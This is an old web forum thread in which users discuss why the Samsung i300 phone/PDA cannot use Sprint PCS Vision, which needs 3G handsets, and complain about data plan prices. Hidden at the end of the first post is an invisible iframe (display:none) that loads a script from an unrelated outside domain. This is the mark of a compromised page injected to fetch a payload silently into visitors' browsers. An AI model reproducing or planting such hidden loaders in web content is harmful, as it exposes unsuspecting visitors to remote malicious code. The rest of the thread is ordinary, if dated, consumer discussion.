+ Reply to Thread

Question Sprin Vision

OK, some of this sounds cool (different rings for different people, pics, neat but not necessary), but is pricey. However, I looked on Sprint's web sight and the I300 is not listed as Vision capable??? Why?? From the little I found, this phone/PDA *should* be compatible (for at least some stuff, like the ringers and pick stuff).

Dose anybody know why the I300 isn't vision compatible? Or is it and Sprint forgot about it ?!?! And if it is not compatible, is there a way to set up different rings for different people??

thx<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

pcs vision is for 3G enabled phones, and the i300 is not 3g.. its 2.5g. there are no software or hardware updates that will make it 3g or "vision" capable. 3g uses a whole different chipset than whats in the i300. there is no mistake.

RJS
    From what I've been hearing and reading, I want nothing to do with SPCS Vision. I would lose my $35 plan and have to take the jump up to $85 for 8 lousy MB of data.

The only real advantage I see is the increased data speeds. Until the unlimited data comes down in price, it doesn't make sense for me to switch.

I've been anxiously waiting for the Kyo 7135 or the new Sam i330 but now I've come to learn that the current 3g handsets do not support 2g data services. In other words, my wireless web would be useless unless I subscribed to a Vision Plan. Others will disagree, but I think "Vision" is the biggest ripoff on the wireless market today.

Be happy your i300 is Vision Free!

compatibility

I am still looking for further evidence (mostly in part to the fact that I don't want to believe it) and the Sprint site does not point out to anything furthering this assumption, but is that a positive fact that 3G enabled phones will not be backwards-compatible with the 2G network? I guess, I'm mostly referring to the chipset on the 7135.

I'm with you nahum. Lets try to get this confirmed everyone.

Administrator

Arrow

if you are on sprint and you buy a 3g handset, in order use any data services, you must subscribe to 3g.. period.

if you are on verizon you can stick with 2 and 3g since not all of their coverage area is 3g...

hope this helps...